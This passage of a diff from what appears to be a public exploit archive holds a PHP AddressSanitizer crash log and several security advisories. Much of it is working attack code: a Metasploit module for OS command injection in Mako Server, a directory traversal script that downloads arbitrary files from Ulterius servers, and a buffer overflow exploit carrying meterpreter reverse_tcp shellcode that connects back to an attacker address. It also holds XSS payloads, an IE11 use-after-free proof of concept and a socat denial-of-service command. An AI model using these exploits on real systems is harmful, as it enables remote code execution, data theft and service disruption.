#4 0x8b7164c in _ecalloc /home/weilei/php-7.1.8/Zend/zend_alloc.c:2495
#5 0x809bd8a in timelib_string /home/weilei/php-7.1.8/ext/date/lib/parse_date.c:460
#6 0x80dfcbb in scan /home/weilei/php-7.1.8/ext/date/lib/parse_date.c:18215
#7 0x80f0710 in timelib_strtotime /home/weilei/php-7.1.8/ext/date/lib/parse_date.c:23194
#8 0x806afed in php_parse_date /home/weilei/php-7.1.8/ext/date/php_date.c:1455
#9 0x8a2c588 in php_wddx_process_data /home/weilei/php-7.1.8/ext/wddx/wddx.c:1071
#10 0x8a40f7b in _cdata_handler /home/weilei/php-7.1.8/ext/xml/compat.c:265
#11 0xb5cc06b5 in xmlParseCharData__internal_alias /home/weilei/libxml2/parser.c:4597
#12 0xb5d129be in xmlParseTryOrFinish /home/weilei/libxml2/parser.c:11715
#13 0xb5d1a462 in xmlParseChunk__internal_alias /home/weilei/libxml2/parser.c:12454
#14 0x8a42de6 in php_XML_Parse /home/weilei/php-7.1.8/ext/xml/compat.c:600
#15 0x8a2c974 in php_wddx_deserialize_ex /home/weilei/php-7.1.8/ext/wddx/wddx.c:1105
#16 0x8a2f394 in zif_wddx_deserialize /home/weilei/php-7.1.8/ext/wddx/wddx.c:1323
#17 0x8ddcd0b in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/weilei/php-7.1.8/Zend/zend_vm_execute.h:675
#18 0x8dd70df in execute_ex /home/weilei/php-7.1.8/Zend/zend_vm_execute.h:429
#19 0x8dd8845 in zend_execute /home/weilei/php-7.1.8/Zend/zend_vm_execute.h:474
#20 0x8c32247 in zend_execute_scripts /home/weilei/php-7.1.8/Zend/zend.c:1476
#21 0x8a5fbc5 in php_execute_script /home/weilei/php-7.1.8/main/main.c:2537
#22 0x90f5a70 in do_cli /home/weilei/php-7.1.8/sapi/cli/php_cli.c:993
#23 0x90f834b in main /home/weilei/php-7.1.8/sapi/cli/php_cli.c:1381
#24 0xb5ab9a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/weilei/php-7.1.8/ext/date/lib/parse_date.c:410 timelib_meridian
Shadow bytes around the buggy address:
0x36ae0aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36ae0ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36ae0ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36ae0ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36ae0ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x36ae0af0: fa fa fa fa fa fa fa fa fa fa fd fa fa fa 00[04]
0x36ae0b00:fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36ae0b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36ae0b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36ae0b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36ae0b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap righ redzone: fb
Freed Heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==13788== ABORTING
Aborted
*/

2
platforms/multiple/remote/28981.txt
View file

@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code execute in the
WebSphere Application Server 6 is vulnerable; other versions may also be affected.
GET /<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT> HTTP/1.1
GET /<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT> HTTP/1.1

2
platforms/php/webapps/1317.py
View file

@ -62,4 +62,4 @@ passwd=conf[:conf.find("'")]
print '[+]Exploit Succeed'
print '[+]User :', user, 'Pass :', passwd
# milw0rm.com [2005-11-13]
# milw0rm.com [2005-11-13]

4
platforms/php/webapps/26817.txt
View file

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/15855/info
source: http://www.securityfocus.com/bid/15855/info
PHPNuke is prone to a content filtering bypass vulnerability. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.
@ -12,4 +12,4 @@ Insert:
URI:
http://www.example.com/[DIR]//modules.php?name=Web_Links
Insert:
<iframe src=http://www.example.com?phpnuke79 <
<iframe src=http://www.example.com?phpnuke79 <

4
platforms/php/webapps/38688.txt
View file

@ -1,4 +1,4 @@
[+] Credits: hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
@ -151,4 +151,4 @@ The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
by hyp3rlinx

32
platforms/php/webapps/43140.txt Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: KirbyCMS <2.5.7 Stored Cross Site Scripting
# Vendor Homepage: https://getkirby.com/
# Software Link: https://getkirby.com/try
# Discovered by: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: webapps
# Platform: PHP
# CVE: CVE-2017-16807
1. Description
A cross-site Scripting (XSS) vulnerability in Kirby Panel before 2.3.3, 2.4.x before 2.4.2, and 2.5.x before 2.5.7 exists when displaying a specially prepared SVG document that has been uploaded as a content file.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16807
2. Proof of Concept
Steps to Reproduce:
Log in as an Editor and click on Site Options
Add the malicious .svg file which contains the javascript to the Site
Login to another browser with Admin Credentials.
Click on Site Options.
Click on the newly added .svg file
3. Reference
https://getkirby.com/changelog/kirby-2-5-7
4. Solution
The vulnerability is patched by the vendor in the version 2.5.7.

112
platforms/windows/dos/43131.html Executable file
View file

@ -0,0 +1,112 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1340
There is a use-after-free in jscript.dll library that can be exploited in IE11.
jscript.dll is an old JavaScript library that was used in IE 8 and back. However, IE11 can still load it if put into IE8 compatibility mode and if there is a script tag that can only be understood by the older library (specifically, a script tag with language="Jscript.Encode" attribute will do the trick).
PoC:
=========================================
-->
<!-- saved from url=(0014)about:internet -->
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
</head>
<body>
<script language="Jscript.Encode">
var e = new Error();
var o = {toString:function() {
//alert('in toString');
e.name = 1;
CollectGarbage();
//reallocate
for(var i=0;i<100;i++) {
e.name = {};
}
return 'b';
}};
e.name = Array(1000).join('a');
e.message = o;
//alert('calling JsErrorToString');
var result = e.toString();
//alert('boom');
alert(result);
</script>
</body>
</html>
<!--
=========================================
This is a use-after-free in jscript!JsErrorToString that can lead to a heap overflow. (The PoC above crashes in memcpy when attempting to copy a large amount of data).
When JsErrorToString runs, it tries to concatenate “name” and “message” properties of an Error object into an AString object (AString is a string type that is implemented as a list of simpler string parts). First the function converts both “name” and “message” properties to strings using the ConvertToString function, however the second call to ConvertToString can trigger a callback (via toString) and delete the “name” string.
Later, when AString is converted to the BString in AString::ConvertToBSTR, the size of the result BString could be calculated incorrectly which can lead to a heap overflow.
Debug log:
=========================================
(10b8.1364): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000003 ebx=00000006 ecx=dcbabbb8 edx=00000003 esi=e6e8bb7f edi=e900fb9b
eip=751c9a6c esp=09dfbdfc ebp=09dfbe04 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
msvcrt!memcpy+0x270:
751c9a6c 8a4603 mov al,byte ptr [esi+3] ds:002b:e6e8bb82=??
0:008> k
# ChildEBP RetAddr
00 09dfbe04 7013c367 msvcrt!memcpy+0x270
01 09dfbe28 7013c3df jscript!AString::ConvertToBSTR+0x86
02 09dfbe30 7013eeff jscript!VAR::ConvertASTRtoBSTR+0x13
03 09dfbe6c 7013af84 jscript!InvokeDispatch+0x424
04 09dfbf38 7013aefe jscript!InvokeDispatchEx+0x7a
05 09dfbf68 701244a7 jscript!VAR::InvokeByDispID+0x90
06 09dfc360 701248ff jscript!CScriptRuntime::Run+0x12b9
07 09dfc45c 70124783 jscript!ScrFncObj::CallWithFrameOnStack+0x15f
08 09dfc4b4 70124cc3 jscript!ScrFncObj::Call+0x7b
09 09dfc558 70133797 jscript!CSession::Execute+0x23d
0a 09dfc5a0 70135353 jscript!COleScript::ExecutePendingScripts+0x16b
0b 09dfc61c 70135139 jscript!COleScript::ParseScriptTextCore+0x206
0c 09dfc648 6bcecf1c jscript!COleScript::ParseScriptText+0x29
0d 09dfc680 6bced6da MSHTML!CActiveScriptHolder::ParseScriptText+0x51
0e 09dfc6f0 6ba5f185 MSHTML!CScriptCollection::ParseScriptText+0x1c6
0f 09dfc7dc 6ba5ecf7 MSHTML!CScriptData::CommitCode+0x31e
10 09dfc85c 6ba5f8bd MSHTML!CScriptData::Execute+0x232
11 09dfc87c 6bced030 MSHTML!CHtmScriptParseCtx::Execute+0xed
12 09dfc8d0 6bcf8265 MSHTML!CHtmParseBase::Execute+0x201
13 09dfc8ec 6b76388c MSHTML!CHtmPost::Broadcast+0x18e
14 09dfca24 6b894a9d MSHTML!CHtmPost::Exec+0x617
15 09dfca44 6b894a03 MSHTML!CHtmPost::Run+0x3d
16 09dfca60 6b89c1e5 MSHTML!PostManExecute+0x61
17 09dfca74 6b89d578 MSHTML!PostManResume+0x7b
18 09dfcaa4 6b796dbc MSHTML!CHtmPost::OnDwnChanCallback+0x38
19 09dfcabc 6b6d5b90 MSHTML!CDwnChan::OnMethodCall+0x2f
1a 09dfcb0c 6b6d577a MSHTML!GlobalWndOnMethodCall+0x16c
1b 09dfcb60 760f62fa MSHTML!GlobalWndProc+0x103
1c 09dfcb8c 760f6d3a user32!InternalCallWinProc+0x23
1d 09dfcc04 760f77c4 user32!UserCallWinProcCheckWow+0x109
1e 09dfcc64 760f788a user32!DispatchMessageWorker+0x3b5
1f 09dfcc74 6cada8ec user32!DispatchMessageW+0xf
20 09dffe40 6cb056d8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
21 09dfff00 76ab2f5c IEFRAME!LCIETab_ThreadProc+0x3e7
22 09dfff18 74693a31 iertutil!CMemBlockRegistrar::_LoadProcs+0x67
23 09dfff50 7667336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
24 09dfff5c 77379902 kernel32!BaseThreadInitThunk+0xe
25 09dfff9c 773798d5 ntdll!__RtlUserThreadStart+0x70
26 09dfffb4 00000000 ntdll!_RtlUserThreadStart+0x1b
=========================================
-->

177
platforms/windows/dos/43144.txt Executable file
View file

@ -0,0 +1,177 @@
X41 D-Sec GmbH Security Advisory: X41-2017-006
Multiple Vulnerabilities in PSFTPd Windows FTP Server
=====================================================
Overview
--------
Confirmed Affected Versions: 10.0.4 Build 729
Confirmed Patched Versions: None
Vendor: Sergei Pleis Softwareentwicklung
Vendor URL: http://www.psftp.de/ftp-server/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn, Markus Vervier
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-006-psftpd/
Summary and Impact
------------------
Several issues have been identified, which allow attackers to hide
information in log files, recover passwords and crash the whole server.
It uses neither ASLR nor DEP to make exploitation harder.
Product Description
-------------------
From the vendor page, roughly translated:
PSFTPd is a userfriendly, functional and robust FTP server software with
support for FTP, FTPS and SFTP.
Use after free
==============
Severity Rating: High
Vector: Network
CVE: CVE-2017-15271
CWE: 416
CVSS Score: 7.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Summary and Impact
------------------
An invalid memory access issue could be triggered remotely in the SFTP
component of PSFTPd. This issue could be triggered prior authentication.
The PSFTPd server did not automatically restart, which enabled attackers
to perform a very effective DoS attack against this service. By sending
the following SSH identification / version string to the server, a NULL
pointer dereference could be triggered:
$ cat tmp.14
SSH-2.0-BBBBBBBB
CCCCCCCCCCCC
$ cat tmp.14 | socat - TCP:192.168.122.50:22
The issue appears to be a race condition in the window message handling,
performing the cleanup for invalid connections. Upon further
investigation X41 D-Sec GmbH could confirm that the accessed memory was
already freed.
X41 D-Sec GmbH enabled the memory debugging functionality page heap for
the psftpd_svc.exe exeutable using the command agflags.exe /p /disable
psftpd_svc.exe /fulla. When observing the crash in the WinDBG 19
debugging tool, it could be confirmed that access to an already freed
page was taking place.
Log Injection
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-15270
CWE: 117
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Summary and Impact
------------------
The PSFTPd server does not properly escape data before writing it into a
Comma Separated Values (CSV) file. This can be used by attackers to hide
data in the Graphical User Interface (GUI) view and create arbitrary
entries to a certain extent.
Special characters as '"', ',' and '\r' are not escaped and can be used
to add new entries to the log.
Workarounds
-----------
None
Passwords stored in Plain Text
==============================
Severity Rating: Low
Vector: Local
CVE: CVE-2017-15272
CWE: 312
CVSS Score: 3.3
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
The PSFTPd server stores its configuration inside the PSFTPd.dat. This
file is a Microsoft Access Database and can be extracted by using the
command "mdb-export PSFTPd.dat USERS" from mdbtools
(https://github.com/brianb/mdbtools). The application sets the encrypt
flag with the password "ITsILLEGAL", but this is not required to extract
the data.
The users password is shown in clear text, since it is not stored securely.
Workarounds
-----------
Use the Active Directory connector for your users.
FTP Bounce Scan
===============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-15269
CWE: 441
CVSS Score: 5.0
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Summary and Impact
------------------
The PSFTPd server does not prevent FTP bounce scans by default.
These can be performed using "nmap -b" and allow to perform scans via
the FTP server.
Workarounds
-----------
It is possible to prevent FTP bounce scans by setting: Kontrollmanager >
Domain > Sicherheit > Register "FTP Bounce and FXP"
Workarounds
-----------
None
About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.
Timeline
--------
2017-08-31 Issues found
2017-09-18 Vendor contacted
2017-09-19 Vendor reply
2017-10-11 CVE IDs requested
2017-10-11 CVE IDs assigned
2017-11-06 Vendor informed us, that apparently a fixed version was
released. We cannot confirm, since we do not have
access.
2017-11-07 Public release

4
platforms/windows/local/43134.c
View file

@ -1,4 +1,4 @@
[+] Credits: John Page a.k.a hyp3rlinx
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec
@ -139,4 +139,4 @@ is given to the author. The author is not responsible for any misuse of the info
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
hyp3rlinx

4
platforms/windows/local/43139.c
View file

@ -1,4 +1,4 @@
/*
/*
Exploit Title - IKARUS anti.virus Arbitrary Write Privilege Escalation
Date - 13th November 2017
@ -274,4 +274,4 @@ int main(int argc, char *argv[])
spawnShell();
return 0;
}
}

125
platforms/windows/remote/43132.rb Executable file
View file

@ -0,0 +1,125 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Mako Server v2.5 OS Command Injection RCE',
'Description' => %q{
This module exploits a vulnerability found in Mako Server v2.5.
It's possible to inject arbitrary OS commands in the Mako Server
tutorial page through a PUT request to save.lsp.
Attacker input will be saved on the victims machine and can
be executed by sending a GET request to manage.lsp.
},
'License' => MSF_LICENSE,
'Author' =>
[
'John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure', # Vulnerability discovery & PoC
'Steven Patterson (Shogun Lab) <steven[at]shogunlab.com>' # Metasploit module
],
'References' =>
[
['EDB', '42683'],
['URL', 'https://blogs.securiteam.com/index.php/archives/3391']
],
'Arch' => ARCH_CMD,
'Platform' => 'win',
'Targets' =>
[
['Mako Server v2.5 - Windows x86/x64', { }]
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Sep 3 2017'))
register_options(
[
OptString.new('URI', [true, 'URI path to the Mako Server app', '/'])
]
)
end
def check
vprint_status('Trying to detect running Mako Server and necessary files...')
# Send GET request to determine existence of save.lsp page
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp')
}, 20)
# If response does not include "MakoServer.net", target is not viable.
if res.headers['Server'] !~ /MakoServer.net/
vprint_warning('Target is not a Mako Server.')
return CheckCode::Safe
end
if res.body
if res.body =~ /Incorrect usage/
# We are able to determine that the server has a save.lsp page and
# returns the correct output.
vprint_status('Mako Server save.lsp returns correct ouput.')
return CheckCode::Appears
else
# The page exists, but is not returning the expected output.
# May be a different version?
vprint_warning('Mako Server save.lsp did not return expected output.')
return CheckCode::Detected
end
else
# The above checks failed and exploitability could not be determined.
vprint_error('Unable to determine exploitability, save.lsp not found.')
return CheckCode::Unknown
end
return CheckCode::Safe
end
def exploit
print_status('Sending payload to target...')
# The double square brackets helps to ensure single/double quotes
# in cmd payload do not interfere with syntax of os.execute Lua function.
cmd = %{os.execute([[#{payload.encoded}]])}
# If users want to troubleshoot their cmd payloads, they can see the
# Lua function with params that the module uses in a more verbose mode.
vprint_status("Now executing the following command: #{cmd}")
# Send a PUT request to save.lsp with command payload
begin
vprint_status('Sending PUT request to save.lsp...')
send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp?ex=2.1'),
'ctype' => 'text/plain',
'data' => cmd,
'http' => {
'X-Requested-With' => 'XMLHttpRequest',
'Referer' => 'http://localhost/Lua-Types.lsp'
}
}, 20)
rescue StandardError => e
fail_with(Failure::NoAccess, "Error: #{e}")
end
# Send a GET request to manage.lsp with execute set to true
begin
vprint_status('Sending GET request to manage.lsp...')
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['URI'], 'examples/manage.lsp?execute=true&ex=2.1&type=lua')
}, 20)
rescue StandardError => e
fail_with(Failure::NoAccess, "Error: #{e}")
end
end
end

111
platforms/windows/remote/43141.py Executable file
View file

@ -0,0 +1,111 @@
# Exploit Title: Ulterius Server < 1.9.5.0 Directory Traversal Arbitrary File Access
# Date: 11/13/2017
# Exploit Author: Rick Osgood
# Vendor Homepage: https://ulterius.io/
# Software Link: https://github.com/Ulterius/server/tree/0e4f2113da287aac88a8b4c5f8364a03685d393d
# Version: < 1.9.5.0
# Tested on: Windows Server 2012 R2
# CVE : CVE-2017-16806
#
# You can download almost any file that resides on the same drive letter as Ulterius server.
# Example: http://ulteriusURL:22006/.../.../.../.../.../.../.../.../.../windows/win.ini
#
# Unfortunately, you need to know the path to the file you want to download.
# Fortunately, Ulterius indexes every file on the system, and it's usually stored in the same place:
# http://ulteriusURL:2206/.../fileIndex.db
#
# This script will retrieve the fileIndex.db file for you, decompress it, and process the list to
# make it human readable. Then you can use the same script to download any juicy files you find.
#
# Ulterius writes the following to the fileIndex.db file:
# First four bytes are a timestamp so we can ignore this
# The next four items repeat until the end of the file:
# filename.length (4 bytes?)
# filename
# directory.length (4 bytes?)
# directory
import requests
import sys
import argparse
import zlib
import struct
# This function grabs the filename or file path from the fileIndex
def processChunk(i, data):
length = struct.unpack('B', data[i])[0]
length += struct.unpack('B', data[i+1])[0]
length += struct.unpack('B', data[i+2])[0]
length += struct.unpack('B', data[i+3])[0]
i += 4
filename = data[i:i+length]
i += length
return i, filename
# Main function
def main():
# Parse arguments
parser = argparse.ArgumentParser(description='Ulterius exploit by Rick osgood')
parser.add_argument('url', type=str, nargs='+', help='URL of the Ulterius server including port')
parser.add_argument('--retrieve', metavar='FILEPATH', type=str, nargs='+', help='Retrieve file from server (e.g. c:\windows\win.ini)')
parser.add_argument('--index', help='Retrieve, decompress, and process fileIndex.db (List of all files indexed by Ulterius)', action='store_true')
args = parser.parse_args()
# We are going to retrieve a specified file
if args.retrieve:
fileName = str(args.retrieve[0])
# This works for the default Ulterius install directory.
baseDir = "/.../.../.../.../.../.../.../.../.../"
# Remove slashes from output file name
outFile = fileName.replace('\\','_')
# Remove drive letter and change slashes
if ":\\" in fileName[:3]:
fileName = fileName[3:]
# Replace slashes
fileName = fileName.replace('\\','/') # Replace slashes
# Build URL
url = str(args.url[0]) + baseDir + fileName
print "Retrieving " + url
# Download file
r = requests.get(url=url, stream=True) # Retrieve file
# Write file
f = open(outFile, 'w')
f.write(r.content)
# We are going to download the fileIndex.db file
if args.index:
# Setup the URL
url = args.url[0] + "/.../fileIndex.db"
print "Downloading " + url
# Download file
r = requests.get(url=url, stream=True)
# decompress the data
data = zlib.decompress( r.content, -15 )
# Open output file for writing
f = open('fileIndex.db', 'w')
# Strip off header info (not sure what this is)
data = data[8:]
# Process file names and write to output file
i = 0
while i < len(data):
i, filename = processChunk(i, data) # Get file name
i, directory = processChunk(i, data) # Get file path
i += 8 # Skip the FFFFFFFFFFFFFFFF
f.write(directory + '\\' + filename + '\n') # Write to output file
if __name__ == "__main__":
main()

72
platforms/windows/remote/43145.py Executable file
View file

@ -0,0 +1,72 @@
# Tested on Windows 10 (x86)
# The application requires to have the web server enabled.
# Exploit for older version: https://www.exploit-db.com/exploits/40832/
#!/usr/bin/python
import socket,os,time,struct,argparse
parser = argparse.ArgumentParser()
parser.add_argument('--host', required=True)
args = parser.parse_args()
host = args.host
port = 80
# root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.116.166 LPORT=4455 -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py
shellcode = ""
shellcode += "\xba\xb6\x9f\x39\x88\xd9\xf7\xd9\x74\x24\xf4\x5e\x31"
shellcode += "\xc9\xb1\x54\x83\xee\xfc\x31\x56\x0f\x03\x56\xb9\x7d"
shellcode += "\xcc\x74\x2d\x03\x2f\x85\xad\x64\xb9\x60\x9c\xa4\xdd"
shellcode += "\xe1\x8e\x14\x95\xa4\x22\xde\xfb\x5c\xb1\x92\xd3\x53"
shellcode += "\x72\x18\x02\x5d\x83\x31\x76\xfc\x07\x48\xab\xde\x36"
shellcode += "\x83\xbe\x1f\x7f\xfe\x33\x4d\x28\x74\xe1\x62\x5d\xc0"
shellcode += "\x3a\x08\x2d\xc4\x3a\xed\xe5\xe7\x6b\xa0\x7e\xbe\xab"
shellcode += "\x42\x53\xca\xe5\x5c\xb0\xf7\xbc\xd7\x02\x83\x3e\x3e"
shellcode += "\x5b\x6c\xec\x7f\x54\x9f\xec\xb8\x52\x40\x9b\xb0\xa1"
shellcode += "\xfd\x9c\x06\xd8\xd9\x29\x9d\x7a\xa9\x8a\x79\x7b\x7e"
shellcode += "\x4c\x09\x77\xcb\x1a\x55\x9b\xca\xcf\xed\xa7\x47\xee"
shellcode += "\x21\x2e\x13\xd5\xe5\x6b\xc7\x74\xbf\xd1\xa6\x89\xdf"
shellcode += "\xba\x17\x2c\xab\x56\x43\x5d\xf6\x3e\xa0\x6c\x09\xbe"
shellcode += "\xae\xe7\x7a\x8c\x71\x5c\x15\xbc\xfa\x7a\xe2\xc3\xd0"
shellcode += "\x3b\x7c\x3a\xdb\x3b\x54\xf8\x8f\x6b\xce\x29\xb0\xe7"
shellcode += "\x0e\xd6\x65\x9d\x04\x40\x2a\x72\x6d\x36\x5a\x71\x8d"
shellcode += "\x27\xfc\xfc\x6b\x17\x52\xaf\x23\xd7\x02\x0f\x94\xbf"
shellcode += "\x48\x80\xcb\xdf\x72\x4a\x64\x75\x9d\x23\xdc\xe1\x04"
shellcode += "\x6e\x96\x90\xc9\xa4\xd2\x92\x42\x4d\x22\x5c\xa3\x24"
shellcode += "\x30\x88\xd2\xc6\xc8\x48\x7f\xc7\xa2\x4c\x29\x90\x5a"
shellcode += "\x4e\x0c\xd6\xc4\xb1\x7b\x64\x02\x4d\xfa\x5d\x78\x7b"
shellcode += "\x68\xe2\x16\x83\x7c\xe2\xe6\xd5\x16\xe2\x8e\x81\x42"
shellcode += "\xb1\xab\xce\x5e\xa5\x67\x5a\x61\x9c\xd4\xcd\x09\x22"
shellcode += "\x02\x39\x96\xdd\x61\x3a\xd1\x22\xf7\x1e\x7a\x4b\x07"
shellcode += "\x1e\x7a\x8b\x6d\x9e\x2a\xe3\x7a\xb1\xc5\xc3\x83\x18"
shellcode += "\x8e\x4b\x09\xcc\x7c\xed\x0e\xc5\x21\xb3\x0f\xe9\xf9"
shellcode += "\xa2\x81\x0e\xfe\xca\x63\x33\x28\xf3\x11\x74\xe8\x40"
shellcode += "\x29\xcf\x4d\xe0\xa0\x2f\xc1\xf2\xe0"
buffer = "\x41" * 780
buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
buffer += "\x90" * 12
buffer += shellcode
buffer += "\x90" * (10000 - len(buffer))
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.228.140\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=" + buffer
evil += "&password=" + buffer + "\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((host,port))
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()